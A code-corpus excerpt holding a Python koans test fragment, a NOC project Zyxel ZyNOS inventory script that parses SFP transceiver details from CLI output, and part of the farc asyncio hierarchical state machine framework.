count_of_three = (1, 2, 5)
try:
count_of_three.append("boom")
except Exception as ex:
self.assertEqual(AttributeError, type(ex))
self.assertMatch('object', ex[0])
# Tuples are less flexible than lists, but faster.
def test_tuples_can_only_be_changed_through_replacement(self):
count_of_three = (1, 2, 5)
list_count = list(count_of_three)
list_count.append("boom")
count_of_three = tuple(list_count)
self.assertEqual((1, 2, 5, 'boom'), count_of_three)
def test_tuples_of_one_look_peculiar(self):
self.assertEqual(type(int(1)), (1).__class__)
self.assertEqual(type((1,2)), (1,).__class__)
self.assertEqual(('Hello comma!',), ("Hello comma!", ))
def test_tuple_constructor_can_be_surprising(self):
self.assertEqual(('S', 'u', 'r', 'p', 'r', 'i', 's', 'e', '!'), tuple("Surprise!"))
def test_creating_empty_tuples(self):
self.assertEqual(tuple(), ())
self.assertEqual((), tuple()) # Sometimes less confusing
def test_tuples_can_be_embedded(self):
lat = (37, 14, 6, 'N')
lon = (115, 48, 40, 'W')
place = ('Area 51', lat, lon)
self.assertEqual(('Area 51',(37,14,6,'N'),(115,48,40,'W')), place)
def test_tuples_are_good_for_representing_records(self):
locations = [
("Illuminati HQ", (38, 52, 15.56, 'N'), (77, 3, 21.46, 'W')),
("Stargate B", (41, 10, 43.92, 'N'), (1, 49, 34.29, 'W')),
]
locations.append(
("Cthulhu", (26, 40, 1, 'N'), (70, 45, 7, 'W'))
)
self.assertEqual('Cthulhu', locations[2][0])
self.assertEqual(15.56, locations[0][1][2])
| true | true |
79010bfa5dcddc4ff2329950b737d68fa1c649bb | 5,303 | py | Python | sa/profiles/Zyxel/ZyNOS/get_inventory.py | xUndero/noc | 9fb34627721149fcf7064860bd63887e38849131 | [
"BSD-3-Clause"
] | 1 | 2019-09-20T09:36:48.000Z | 2019-09-20T09:36:48.000Z | sa/profiles/Zyxel/ZyNOS/get_inventory.py | ewwwcha/noc | aba08dc328296bb0e8e181c2ac9a766e1ec2a0bb | [
"BSD-3-Clause"
] | null | null | null | sa/profiles/Zyxel/ZyNOS/get_inventory.py | ewwwcha/noc | aba08dc328296bb0e8e181c2ac9a766e1ec2a0bb | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
# ---------------------------------------------------------------------
# Zyxel.ZyNOS.get_inventory
# ---------------------------------------------------------------------
# Copyright (C) 2007-2019 The NOC Project
# See LICENSE for details
# ---------------------------------------------------------------------
# Python modules
import re
# NOC modules
from noc.core.script.base import BaseScript
from noc.sa.interfaces.igetinventory import IGetInventory
class Script(BaseScript):
    # Inventory collector for Zyxel ZyNOS switches: reports the chassis
    # record plus one record per detected SFP transceiver.
    name = "Zyxel.ZyNOS.get_inventory"
    interface = IGetInventory
    def remove_non_ascii(self, s, sub="?"):
        # Replace every non-ASCII character of ``s`` with ``sub``.
        # Used to sanitize vendor/part-number strings read from SFP
        # EEPROMs, which often contain junk bytes.
        return "".join([i if ord(i) < 128 else sub for i in s])
    def execute(self):
        # Entry point: build the inventory list, chassis first,
        # then the transceivers found by get_transceivers().
        objects = []
        v = self.scripts.get_version()
        part_no = v["platform"]
        vendor = v["vendor"]
        # Chassis record assembled from get_version() output.
        p = {
            "type": "CHASSIS",
            "number": 1,
            "vendor": vendor,
            "description": part_no,
            "part_no": [part_no],
            "builtin": False,
        }
        # The serial number attribute is optional in get_version() output.
        if v.get("attributes", {}).get("Serial Number", ""):
            p["serial"] = v["attributes"]["Serial Number"]
        objects += [p]
        objects += self.get_transceivers()
        return objects
    def get_transceivers(self):
        # Scrape SFP details from the device CLI and normalize them into
        # XCVR inventory records.
        def get_offset(offset):
            # Build a renumbering function mapping the CLI's SFP index to
            # the inventory slot number, shifted by a per-platform offset.
            def wrap(x):
                return str(int(x) + offset)
            return wrap
        objects = []
        if self.match_version(version__startswith="3.90"):
            # Firmware 3.90 has a native "show interface transceiver"
            # command whose port numbers need no offset.
            xcvr_n = get_offset(0)
            inv = self.cli("show interface transceiver *")
            rx_trans = re.compile(
                r"Port\s+:\s+(?P<number>\d+)\s+\S+\n"
                r"Vendor\s+:\s+(?P<vendor>\S+)\s*\n"
                r"Part Number\s+:\s+(?P<part_no>\S+\s*\S*)\s*\n"
                r"Serial Number\s+:\s+(?P<serial>\S+)\s*\n"
                r"Revision\s+:\s+(?P<rev>\S+)?\s*\n"
                r"Date Code\s+:\s+\S+\n"
                r"Transceiver\s+:\s+(?P<type>\S+)",
                re.MULTILINE | re.DOTALL,
            )
        else:
            # Older firmware: SFP data is only available in the ZyNOS debug
            # shell, and the SFP index must be offset per platform so it
            # lines up with the front-panel port numbering.
            if self.match_version(platform__contains="2024"):
                xcvr_n = get_offset(25)
            elif self.match_version(platform__contains="2108"):
                xcvr_n = get_offset(9)
            else:
                xcvr_n = get_offset(1)
            with self.zynos_mode():
                inv = self.cli("sys sw sfp disp")
            rx_trans = re.compile(
                r"SFP\s+:\s+(?P<number>\d+)\s*\n"
                r"Vendor\s+:\s+(?P<vendor>\S+)\s*\n"
                r"Part\sNumber\s+:\s+(?P<part_no>\S+\s*\S*)\s*\n"
                r"Series\sNumber\s+:\s+(?P<serial>\S+)\s*\n"
                r"Revision\s+:\s+(?P<rev>\S+)?\s*\n"
                r"Transceiver\s+:\s+(?P<type>\S+)",
                re.MULTILINE | re.DOTALL,
            )
        for match in rx_trans.finditer(inv):
            # NOTE(review): the encode()/UnicodeDecodeError pattern below
            # looks like Python 2 semantics (str.encode implicitly decodes
            # first); under Python 3 these handlers would never fire --
            # confirm the target interpreter.
            try:
                vendor = match.group("vendor").encode("utf-8")
            except UnicodeDecodeError:
                vendor = "NONAME"
            try:
                part_no = match.group("part_no").encode("utf-8").strip()
            except UnicodeDecodeError:
                part_no = "NoName | Transceiver | Unknown SFP"
            part_no_orig = self.remove_non_ascii(match.group("part_no").strip())
            # Known no-name/OEM vendors get a generic part-number prefix,
            # refined below from the transceiver type description.
            if vendor in ["NONAME", "OEM", "CISCO-FINISAR", "AODevices"]:
                part_no = "NoName | Transceiver | "
            # NOTE(review): this suffix chain runs for every transceiver,
            # not only the no-name ones, so for branded vendors it appends
            # to the genuine part number -- verify the intended nesting.
            description = match.group("type")
            if description.endswith(tuple([" EX", "-EX"])):
                part_no = part_no + "1G | SFP EX"
            elif description.endswith(tuple([" LH", "-LH"])):
                part_no = part_no + "1G | SFP LH"
            elif description.endswith(tuple([" LX", "-LX"])):
                part_no = part_no + "1G | SFP LX"
            elif description.endswith(tuple([" SX", "-SX"])):
                part_no = part_no + "1G | SFP SX"
            elif description.endswith(tuple([" T", "-T"])):
                part_no = part_no + "1G | SFP T"
            elif description.endswith(tuple([" TX", "-TX"])):
                part_no = part_no + "1G | SFP TX"
            elif description.endswith(tuple([" ZX", "-ZX"])):
                part_no = part_no + "1G | SFP ZX"
            elif part_no_orig.endswith(tuple(["BX-U", "BX-1"])):
                part_no = part_no + "1G | SFP BXU"
            elif part_no_orig.endswith("BX-D"):
                part_no = part_no + "1G | SFP BXD"
            else:
                part_no = part_no + "Unknown SFP"
            # Revision is optional in the CLI output; strip non-ASCII junk.
            revision = self.remove_non_ascii(match.group("rev"), "") if match.group("rev") else None
            o = {
                "type": "XCVR",
                "number": xcvr_n(match.group("number")),
                "vendor": vendor,
                "description": "%s (%s)" % (match.group("type"), vendor),
                "part_no": [part_no.strip()],
                "builtin": False,
            }
            if revision:
                o["revision"] = revision
            # Serial is best-effort: skip it if the bytes are not decodable.
            try:
                o["serial"] = match.group("serial").encode("utf-8")
            except UnicodeDecodeError:
                pass
            objects += [o]
        return objects
| 39.87218 | 100 | 0.456723 |
import re
from noc.core.script.base import BaseScript
from noc.sa.interfaces.igetinventory import IGetInventory
class Script(BaseScript):
    """NOC SA script Zyxel.ZyNOS.get_inventory.

    Returns the chassis object plus any SFP transceivers discovered
    over the device CLI.
    """

    name = "Zyxel.ZyNOS.get_inventory"
    interface = IGetInventory

    def remove_non_ascii(self, s, sub="?"):
        """Return *s* with every non-ASCII character replaced by *sub*."""
        return "".join([i if ord(i) < 128 else sub for i in s])

    def execute(self):
        """Entry point: build the inventory list (chassis first, then XCVRs)."""
        objects = []
        v = self.scripts.get_version()
        part_no = v["platform"]
        vendor = v["vendor"]
        # The chassis is always inventory object number 1
        p = {
            "type": "CHASSIS",
            "number": 1,
            "vendor": vendor,
            "description": part_no,
            "part_no": [part_no],
            "builtin": False,
        }
        # Serial number is optional; attach only when get_version() reported one
        if v.get("attributes", {}).get("Serial Number", ""):
            p["serial"] = v["attributes"]["Serial Number"]
        objects += [p]
        objects += self.get_transceivers()
        return objects

    def get_transceivers(self):
        """Collect SFP transceiver records from the device CLI.

        Firmware 3.90 exposes "show interface transceiver *"; older
        firmware requires ZyNOS mode and "sys sw sfp disp".  Reported
        SFP slot numbers are shifted by a per-platform offset so they
        match the port numbering.
        """
        def get_offset(offset):
            # Build a converter that shifts the reported slot number
            # by a fixed platform-specific offset (returned as str).
            def wrap(x):
                return str(int(x) + offset)
            return wrap
        objects = []
        if self.match_version(version__startswith="3.90"):
            xcvr_n = get_offset(0)
            inv = self.cli("show interface transceiver *")
            rx_trans = re.compile(
                r"Port\s+:\s+(?P<number>\d+)\s+\S+\n"
                r"Vendor\s+:\s+(?P<vendor>\S+)\s*\n"
                r"Part Number\s+:\s+(?P<part_no>\S+\s*\S*)\s*\n"
                r"Serial Number\s+:\s+(?P<serial>\S+)\s*\n"
                r"Revision\s+:\s+(?P<rev>\S+)?\s*\n"
                r"Date Code\s+:\s+\S+\n"
                r"Transceiver\s+:\s+(?P<type>\S+)",
                re.MULTILINE | re.DOTALL,
            )
        else:
            # Per-model offsets mapping SFP slot numbers onto port numbers
            if self.match_version(platform__contains="2024"):
                xcvr_n = get_offset(25)
            elif self.match_version(platform__contains="2108"):
                xcvr_n = get_offset(9)
            else:
                xcvr_n = get_offset(1)
            with self.zynos_mode():
                inv = self.cli("sys sw sfp disp")
            rx_trans = re.compile(
                r"SFP\s+:\s+(?P<number>\d+)\s*\n"
                r"Vendor\s+:\s+(?P<vendor>\S+)\s*\n"
                r"Part\sNumber\s+:\s+(?P<part_no>\S+\s*\S*)\s*\n"
                r"Series\sNumber\s+:\s+(?P<serial>\S+)\s*\n"
                r"Revision\s+:\s+(?P<rev>\S+)?\s*\n"
                r"Transceiver\s+:\s+(?P<type>\S+)",
                re.MULTILINE | re.DOTALL,
            )
        for match in rx_trans.finditer(inv):
            # NOTE(review): catching UnicodeDecodeError from .encode() is a
            # Python 2 idiom (implicit ASCII decode of a byte str) — confirm
            # the target interpreter before porting.
            try:
                vendor = match.group("vendor").encode("utf-8")
            except UnicodeDecodeError:
                vendor = "NONAME"
            try:
                part_no = match.group("part_no").encode("utf-8").strip()
            except UnicodeDecodeError:
                part_no = "NoName | Transceiver | Unknown SFP"
            part_no_orig = self.remove_non_ascii(match.group("part_no").strip())
            if vendor in ["NONAME", "OEM", "CISCO-FINISAR", "AODevices"]:
                # Generic vendors: derive a NoName part number from the
                # transceiver type / part-number suffix.
                part_no = "NoName | Transceiver | "
                description = match.group("type")
                if description.endswith(tuple([" EX", "-EX"])):
                    part_no = part_no + "1G | SFP EX"
                elif description.endswith(tuple([" LH", "-LH"])):
                    part_no = part_no + "1G | SFP LH"
                elif description.endswith(tuple([" LX", "-LX"])):
                    part_no = part_no + "1G | SFP LX"
                elif description.endswith(tuple([" SX", "-SX"])):
                    part_no = part_no + "1G | SFP SX"
                elif description.endswith(tuple([" T", "-T"])):
                    part_no = part_no + "1G | SFP T"
                elif description.endswith(tuple([" TX", "-TX"])):
                    part_no = part_no + "1G | SFP TX"
                elif description.endswith(tuple([" ZX", "-ZX"])):
                    part_no = part_no + "1G | SFP ZX"
                elif part_no_orig.endswith(tuple(["BX-U", "BX-1"])):
                    part_no = part_no + "1G | SFP BXU"
                elif part_no_orig.endswith("BX-D"):
                    part_no = part_no + "1G | SFP BXD"
                else:
                    part_no = part_no + "Unknown SFP"
            # Revision is optional in both CLI formats
            revision = self.remove_non_ascii(match.group("rev"), "") if match.group("rev") else None
            o = {
                "type": "XCVR",
                "number": xcvr_n(match.group("number")),
                "vendor": vendor,
                "description": "%s (%s)" % (match.group("type"), vendor),
                "part_no": [part_no.strip()],
                "builtin": False,
            }
            if revision:
                o["revision"] = revision
            # Serial may contain undecodable bytes; omit it in that case
            try:
                o["serial"] = match.group("serial").encode("utf-8")
            except UnicodeDecodeError:
                pass
            objects += [o]
        return objects
| true | true |
79010c011c77fd4468e9ee2a11273d6bd3845d48 | 27,174 | py | Python | farc/__init__.py | SzeMengTan/farc | 26dfd85d6c888914c316c603f1ae3140d696ec84 | [
"MIT"
] | null | null | null | farc/__init__.py | SzeMengTan/farc | 26dfd85d6c888914c316c603f1ae3140d696ec84 | [
"MIT"
] | null | null | null | farc/__init__.py | SzeMengTan/farc | 26dfd85d6c888914c316c603f1ae3140d696ec84 | [
"MIT"
] | null | null | null | import asyncio
import collections
import math
import signal
import sys
from functools import wraps
class Spy(object):
    """Debug-instrumentation hook point for farc.

    The framework calls Spy.on_*() at interesting moments.  Until an
    application activates a driver via Spy.enable_spy(<driver class>),
    every such call resolves to a do-nothing function, so the Spy
    system has zero runtime effect by default.
    """

    # The active Spy driver class, or None when spying is disabled.
    _actv_cls = None

    @staticmethod
    def enable_spy(spy_cls):
        """Select spy_cls as the active Spy driver and initialize it."""
        Spy._actv_cls = spy_cls
        spy_cls.init()

    def __getattr__(self, attr_name):
        """Resolve attribute lookups on the Spy singleton.

        Returns the enable_spy entry point when requested by name;
        otherwise the attribute of the active driver class (when one
        is enabled); otherwise a no-op callable that swallows any
        arguments and returns None.
        """
        if attr_name == "enable_spy":
            return Spy.enable_spy
        if Spy._actv_cls is not None:
            return getattr(Spy._actv_cls, attr_name)
        return lambda *ignored: None
# Singleton pattern:
# Turn Spy into an instance of itself so __getattribute__ works
# on anyone who calls "import Spy; Spy.foo()"
# This prevents Spy() from creating a new instance
# and gives everyone who calls "import Spy" the same object.
# From this point on, the module-level name "Spy" is an instance, not the class.
Spy = Spy()
class Signal(object):
    """An asynchronous stimulus that triggers reactions.

    A unique identifier that, along with a value, specifies an Event.
    p. 154
    """

    _registry = {}   # signal name (str) -> signal id (int)
    _lookup = []     # signal id (int) -> signal name (str)

    @staticmethod
    def exists(signame):
        """Return True when signame is already in the Signal registry."""
        return signame in Signal._registry

    @staticmethod
    def register(signame):
        """Register signame (idempotent) and return its signal id."""
        assert type(signame) is str
        existing = Signal._registry.get(signame)
        if existing is not None:
            # Already registered; hand back the previously assigned id.
            return existing
        sigid = len(Signal._lookup)
        Signal._lookup.append(signame)
        Signal._registry[signame] = sigid
        Spy.on_signal_register(signame, sigid)
        return sigid

    def __getattr__(self, signame):
        """Allow Signal.<NAME> attribute access to look up a registered id."""
        assert type(signame) is str
        return Signal._registry[signame]
# Singleton pattern:
# Turn Signal into an instance of itself so getattr works.
# This also prevents Signal() from creating a new instance.
Signal = Signal()

# Register the reserved (system) signals; ids are assigned in order.
Signal.register("EMPTY")  # 0
Signal.register("ENTRY")  # 1
Signal.register("EXIT")  # 2
Signal.register("INIT")  # 3
# Signals that mirror POSIX signals
Signal.register("SIGINT")  # (i.e. Ctrl+C)
Signal.register("SIGTERM")  # (i.e. kill <pid>)

Event = collections.namedtuple("Event", ["signal", "value"])
Event.__doc__ = """Events are a tuple of (signal, value) that are passed from
one AHSM to another. Signals are defined in each AHSM's source code
by name, but resolve to a unique number. Values are any python value,
including containers that contain even more values. Each AHSM state
(static method) accepts an Event as the parameter and handles the event
based on its Signal."""
# Instantiate the reserved (system) events
Event.EMPTY = Event(Signal.EMPTY, None)
Event.ENTRY = Event(Signal.ENTRY, None)
Event.EXIT = Event(Signal.EXIT, None)
Event.INIT = Event(Signal.INIT, None)
# Events for POSIX signals
Event.SIGINT = Event(Signal.SIGINT, None)  # (i.e. Ctrl+C)
Event.SIGTERM = Event(Signal.SIGTERM, None)  # (i.e. kill <pid>)
# The order of this tuple MUST match their respective signals:
# Hsm.trig() indexes Event.reserved by signal id.
Event.reserved = (Event.EMPTY, Event.ENTRY, Event.EXIT, Event.INIT)
class Hsm(object):
    """A Hierarchical State Machine (HSM).
    Full support for hierarchical state nesting.
    Guaranteed entry/exit action execution on arbitrary state transitions.
    Full support of nested initial transitions.
    Support for events with arbitrary parameters.

    State handlers are @state-decorated static methods taking (me, event)
    and returning one of the RET_* codes below.
    """

    # Every state handler must return one of these values
    RET_HANDLED = 0
    RET_IGNORED = 1
    RET_TRAN = 2
    RET_SUPER = 3

    def __init__(self,):
        """Sets this Hsm's current state to Hsm.top(), the default state
        and stores the given initial state.
        """
        # self.state is the Hsm/act's current active state.
        # This instance variable references the message handler (method)
        # that will be called whenever a message is sent to this Hsm.
        # We initialize this to self.top, the default message handler
        self.state = self.top
        # Farc differs from QP here in that we hardcode
        # the initial state to be "_initial"
        self.initial_state = self._initial

    def _initial(self, event):
        """Raises a NotImplementedError to force the derived class
        to implement its own initial state.
        """
        raise NotImplementedError

    def state(func):
        """A decorator that identifies which methods are states.
        The presence of the farc_state attr, not the value of the attr,
        determines statehood.
        The Spy debugging system uses the farc_state attribute
        to determine which methods inside a class are actually states.
        Other uses of the attribute may come in the future.
        """
        @wraps(func)
        def func_wrap(self, evt):
            result = func(self, evt)
            # Report every state-handler invocation to the Spy system
            Spy.on_state_handler_called(func_wrap, evt, result)
            return result
        setattr(func_wrap, "farc_state", True)
        return staticmethod(func_wrap)

    # Helper functions to process reserved events through the current state
    @staticmethod
    def trig(me, state_func, signal): return state_func(me, Event.reserved[signal])

    @staticmethod
    def enter(me, state_func): return state_func(me, Event.ENTRY)

    @staticmethod
    def exit(me, state_func): return state_func(me, Event.EXIT)

    # Other helper functions (used inside state handlers)
    @staticmethod
    def handled(me, event): return Hsm.RET_HANDLED

    @staticmethod
    def tran(me, nextState): me.state = nextState; return Hsm.RET_TRAN

    @staticmethod
    def super(me, superState): me.state = superState; return Hsm.RET_SUPER  # p. 158

    @state
    def top(me, event):
        """This is the default state handler.
        This handler ignores all signals except
        the POSIX-like events, SIGINT/SIGTERM.
        Handling SIGINT/SIGTERM here causes the Exit path
        to be executed from the application's active state
        to top/here.
        The application may put something useful
        or nothing at all in the Exit path.
        """
        # Handle the Posix-like events to force the HSM
        # to execute its Exit path all the way to the top
        if Event.SIGINT == event:
            return Hsm.RET_HANDLED
        if Event.SIGTERM == event:
            return Hsm.RET_HANDLED
        # All other events are quietly ignored
        return Hsm.RET_IGNORED  # p. 165

    @staticmethod
    def _perform_init_chain(me, current):
        """Act on the chain of initializations required starting from current.
        Returns the leaf state reached after following all INIT transitions.
        """
        t = current
        while Hsm.trig(me, t if t != Hsm.top else me.initial_state, Signal.INIT) == Hsm.RET_TRAN:
            # The state handles the INIT message and needs to make a transition. The
            # "top" state is special in that it does not handle INIT messages, so we
            # defer to me.initial_state in this case
            path = []  # Trace the path back to t via superstates
            while me.state != t:
                path.append(me.state)
                Hsm.trig(me, me.state, Signal.EMPTY)
            # Restore the state to the target state
            me.state = path[0]
            assert len(path) < 32  # MAX_NEST_DEPTH
            # Perform ENTRY action for each state from current to the target
            path.reverse()  # in-place
            for s in path:
                Hsm.enter(me, s)
            # The target state has now to be checked to see if it responds to the INIT message
            t = path[-1]  # -1 because path was reversed
        return t

    @staticmethod
    def _perform_transition(me, source, target):
        """Handle the state transition from source to target in the HSM.
        The case labels below follow the QP transition taxonomy.
        """
        s, t = source, target
        path = [t]
        if s == t:  # Case (a), transition to self
            Hsm.exit(me, s)
            Hsm.enter(me, t)
        else:
            # Find parent of target
            Hsm.trig(me, t, Signal.EMPTY)
            t = me.state  # t is now parent of target
            if s == t:  # Case (b), source is parent of target
                Hsm.enter(me, path[0])
            else:
                # Find parent of source
                Hsm.trig(me, s, Signal.EMPTY)
                if me.state == t:  # Case (c), source and target share a parent
                    Hsm.exit(me, s)
                    Hsm.enter(me, path[0])
                else:
                    if me.state == path[0]:  # Case (d), target is parent of source
                        Hsm.exit(me, s)
                    else:  # Check if the source is an ancestor of the target (case (e))
                        lca_found = False
                        path.append(t)  # Populates path[1]
                        t = me.state  # t is now parent of source
                        # Find and save ancestors of target into path
                        # until we find the source or hit the top
                        me.state = path[1]
                        while me.state != Hsm.top:
                            Hsm.trig(me, me.state, Signal.EMPTY)
                            path.append(me.state)
                            assert len(path) < 32  # MAX_NEST_DEPTH
                            if me.state == s:
                                lca_found = True
                                break
                        if lca_found:  # This is case (e), enter states to get to target
                            for st in reversed(path[:-1]):
                                Hsm.enter(me, st)
                        else:
                            Hsm.exit(me, s)  # Exit the source for cases (f), (g), (h)
                            me.state = t  # Start at parent of the source
                            while me.state not in path:
                                # Keep exiting up into superstates until we reach the LCA.
                                # Depending on whether the EXIT signal is handled, we may also need
                                # to send the EMPTY signal to make me.state climb to the superstate.
                                if Hsm.exit(me, me.state) == Hsm.RET_HANDLED:
                                    Hsm.trig(me, me.state, Signal.EMPTY)
                            t = me.state
                            # Step into children until we enter the target
                            for st in reversed(path[:path.index(t)]):
                                Hsm.enter(me, st)

    @staticmethod
    def init(me, event=None):
        """Transitions to the initial state. Follows any INIT transitions
        from the inital state and performs ENTRY actions as it proceeds.
        Use this to pass any parameters to initialize the state machine.
        p. 172
        """
        # TODO: The initial state MUST transition to another state
        # The code that formerly did this was:
        #   status = me.initial_state(me, event)
        #   assert status == Hsm.RET_TRAN
        # But the above code is commented out so an Ahsm's _initial()
        # isn't executed twice.
        me.state = Hsm._perform_init_chain(me, Hsm.top)

    @staticmethod
    def dispatch(me, event):
        """Dispatches the given event to this Hsm.
        Follows the application's state transitions
        until the event is handled or top() is reached
        p. 174
        """
        Spy.on_hsm_dispatch_event(event)
        # Save the current state
        t = me.state
        # Proceed to superstates if event is not handled, we wish to find the superstate
        # (if any) that does handle the event and to record the path to that state
        exit_path = []
        r = Hsm.RET_SUPER
        while r == Hsm.RET_SUPER:
            s = me.state
            exit_path.append(s)
            Spy.on_hsm_dispatch_pre(s)
            r = s(me, event)  # invoke state handler
        # We leave the while loop with s at the state which was able to respond
        # to the event, or to Hsm.top if none did
        Spy.on_hsm_dispatch_post(exit_path)
        # If the state handler for s requests a transition
        if r == Hsm.RET_TRAN:
            t = me.state
            # Store target of transition
            # Exit from the current state to the state s which handles
            # the transition. We do not exit from s=exit_path[-1] itself.
            for st in exit_path[:-1]:
                r = Hsm.exit(me, st)
                assert (r == Hsm.RET_SUPER) or (r == Hsm.RET_HANDLED)
            s = exit_path[-1]
            # Transition to t through the HSM
            Hsm._perform_transition(me, s, t)
            # Do initializations starting at t
            t = Hsm._perform_init_chain(me, t)
        # Restore the state
        me.state = t
class Framework(object):
    """Framework is a composite class that holds:
    - the asyncio event loop
    - the registry of AHSMs
    - the set of TimeEvents
    - the handle to the next TimeEvent
    - the table subscriptions to events
    """

    _event_loop = asyncio.get_event_loop()

    # The Framework maintains a registry of Ahsms in a list.
    _ahsm_registry = []

    # The Framework maintains a dict of priorities in use
    # to prevent duplicates.
    # An Ahsm's priority is checked against this dict
    # within the Ahsm.start() method
    # when the Ahsm is added to the Framework.
    # The dict's key is the priority (integer) and the value is the Ahsm.
    _priority_dict = {}

    # The Framework maintains a group of TimeEvents in a dict. The next
    # expiration of the TimeEvent is the key and the event is the value.
    # Only the event with the next expiration time is scheduled for the
    # timeEventCallback(). As TimeEvents are added and removed, the scheduled
    # callback must be re-evaluated. Periodic TimeEvents should only have
    # one entry in the dict: the next expiration. The timeEventCallback() will
    # add a Periodic TimeEvent back into the dict with its next expiration.
    _time_events = {}

    # When a TimeEvent is scheduled for the timeEventCallback(),
    # a handle is kept so that the callback may be cancelled if necessary.
    _tm_event_handle = None

    # The Subscriber Table is a dictionary. The keys are signals.
    # The value for each key is a list of Ahsms that are subscribed to the
    # signal. An Ahsm may subscribe to a signal at any time during runtime.
    _subscriber_table = {}

    @staticmethod
    def post(event, act):
        """Posts the event to the given Ahsm's event queue.
        The argument, act, is an Ahsm instance.
        """
        assert isinstance(act, Ahsm)
        act.postFIFO(event)

    @staticmethod
    def post_by_name(event, act_name):
        """Posts the event to the given Ahsm's event queue.
        The argument, act, is a string of the name of the class
        to which the event is sent. The event will post to all actors
        having the given classname.
        """
        assert type(act_name) is str
        for act in Framework._ahsm_registry:
            if act.__class__.__name__ == act_name:
                act.postFIFO(event)

    @staticmethod
    def publish(event):
        """Posts the event to the message queue of every Ahsm
        that is subscribed to the event's signal.
        """
        if event.signal in Framework._subscriber_table:
            for act in Framework._subscriber_table[event.signal]:
                act.postFIFO(event)
        # Run to completion
        Framework._event_loop.call_soon_threadsafe(Framework.run)

    @staticmethod
    def subscribe(signame, act):
        """Adds the given Ahsm to the subscriber table list
        for the given signal. The argument, signame, is a string of the name
        of the Signal to which the Ahsm is subscribing. Using a string allows
        the Signal to be created in the registry if it is not already.
        """
        sigid = Signal.register(signame)
        if sigid not in Framework._subscriber_table:
            Framework._subscriber_table[sigid] = []
        Framework._subscriber_table[sigid].append(act)

    @staticmethod
    def addTimeEvent(tm_event, delta):
        """Adds the TimeEvent to the list of time events in the Framework.
        The event will fire its signal (to the TimeEvent's target Ahsm)
        after the delay, delta.
        """
        expiration = Framework._event_loop.time() + delta
        Framework.addTimeEventAt(tm_event, expiration)

    @staticmethod
    def addTimeEventAt(tm_event, abs_time):
        """Adds the TimeEvent to the list of time events in the Framework.
        The event will fire its signal (to the TimeEvent's target Ahsm)
        at the given absolute time (_event_loop.time()).
        """
        assert tm_event not in Framework._time_events.values()
        Framework._insortTimeEvent(tm_event, abs_time)

    @staticmethod
    def _insortTimeEvent(tm_event, expiration):
        """Inserts a TimeEvent into the list of time events,
        sorted by the next expiration of the timer.
        If the expiration time matches an existing expiration,
        we add the smallest amount of time to the given expiration
        to avoid a key collision in the Dict
        and make the identically-timed events fire in a FIFO fashion.
        """
        # If the event is to happen in the past, post it now
        now = Framework._event_loop.time()
        if expiration < now:
            tm_event.act.postFIFO(tm_event)
            # TODO: if periodic, need to schedule next?
        # If an event already occupies this expiration time,
        # increase this event's expiration by the smallest measurable amount
        # (bump the float mantissa by one epsilon at its current scale)
        while expiration in Framework._time_events.keys():
            m, e = math.frexp(expiration)
            expiration = (m + sys.float_info.epsilon) * 2**e
        Framework._time_events[expiration] = tm_event
        # If this is the only active TimeEvent, schedule its callback
        if len(Framework._time_events) == 1:
            Framework._tm_event_handle = Framework._event_loop.call_at(
                expiration, Framework.timeEventCallback, tm_event, expiration)
        # If there are other TimeEvents,
        # check if this one should replace the scheduled one
        else:
            if expiration < min(Framework._time_events.keys()):
                Framework._tm_event_handle.cancel()
                Framework._tm_event_handle = Framework._event_loop.call_at(
                    expiration, Framework.timeEventCallback, tm_event,
                    expiration)

    @staticmethod
    def removeTimeEvent(tm_event):
        """Removes the TimeEvent from the list of active time events.
        Cancels the TimeEvent's callback if there is one.
        Schedules the next event's callback if there is one.
        """
        for k, v in Framework._time_events.items():
            if v is tm_event:
                # If the event being removed is scheduled for callback,
                # cancel and schedule the next event if there is one
                if k == min(Framework._time_events.keys()):
                    del Framework._time_events[k]
                    if Framework._tm_event_handle:
                        Framework._tm_event_handle.cancel()
                    if len(Framework._time_events) > 0:
                        next_expiration = min(Framework._time_events.keys())
                        next_event = Framework._time_events[next_expiration]
                        Framework._tm_event_handle = \
                            Framework._event_loop.call_at(
                                next_expiration, Framework.timeEventCallback,
                                next_event, next_expiration)
                    else:
                        Framework._tm_event_handle = None
                else:
                    del Framework._time_events[k]
                break

    @staticmethod
    def timeEventCallback(tm_event, expiration):
        """The callback function for all TimeEvents.
        Posts the event to the event's target Ahsm.
        If the TimeEvent is periodic, re-insort the event
        in the list of active time events.
        """
        assert expiration in Framework._time_events.keys(), (
            "Exp:%d _time_events.keys():%s" %
            (expiration, Framework._time_events.keys()))
        # Remove this expired TimeEvent from the active list
        del Framework._time_events[expiration]
        Framework._tm_event_handle = None
        # Post the event to the target Ahsm
        tm_event.act.postFIFO(tm_event)
        # If this is a periodic time event, schedule its next expiration
        if tm_event.interval > 0:
            Framework._insortTimeEvent(tm_event,
                                       expiration + tm_event.interval)
        # If not set already and there are more events, set the next event callback
        if (Framework._tm_event_handle == None and
                len(Framework._time_events) > 0):
            next_expiration = min(Framework._time_events.keys())
            next_event = Framework._time_events[next_expiration]
            Framework._tm_event_handle = Framework._event_loop.call_at(
                next_expiration, Framework.timeEventCallback, next_event,
                next_expiration)
        # Run to completion
        Framework._event_loop.call_soon_threadsafe(Framework.run)

    @staticmethod
    def add(act):
        """Makes the framework aware of the given Ahsm.
        """
        Framework._ahsm_registry.append(act)
        assert act.priority not in Framework._priority_dict, (
            "Priority MUST be unique")
        Framework._priority_dict[act.priority] = act
        Spy.on_framework_add(act)

    @staticmethod
    def run():
        """Dispatches an event to the highest priority Ahsm
        until all event queues are empty (i.e. Run To Completion).
        """
        getPriority = lambda x: x.priority
        while True:
            allQueuesEmpty = True
            sorted_acts = sorted(Framework._ahsm_registry, key=getPriority)
            for act in sorted_acts:
                if act.has_msgs():
                    event_next = act.pop_msg()
                    act.dispatch(act, event_next)
                    allQueuesEmpty = False
                    break
            if allQueuesEmpty:
                return

    @staticmethod
    def stop():
        """EXITs all Ahsms and stops the event loop.
        """
        # Disable the timer callback
        if Framework._tm_event_handle:
            Framework._tm_event_handle.cancel()
            Framework._tm_event_handle = None
        # Post EXIT to all Ahsms
        for act in Framework._ahsm_registry:
            Framework.post(Event.EXIT, act)
        # Run to completion and stop the asyncio event loop
        Framework.run()
        Framework._event_loop.stop()
        Spy.on_framework_stop()

    @staticmethod
    def print_info():
        """Prints the name and current state
        of each actor in the framework.
        Meant to be called when ctrl+T (SIGINFO/29) is issued.
        """
        for act in Framework._ahsm_registry:
            print(act.__class__.__name__, act.state.__name__)

    # Bind a useful set of POSIX signals to the handler
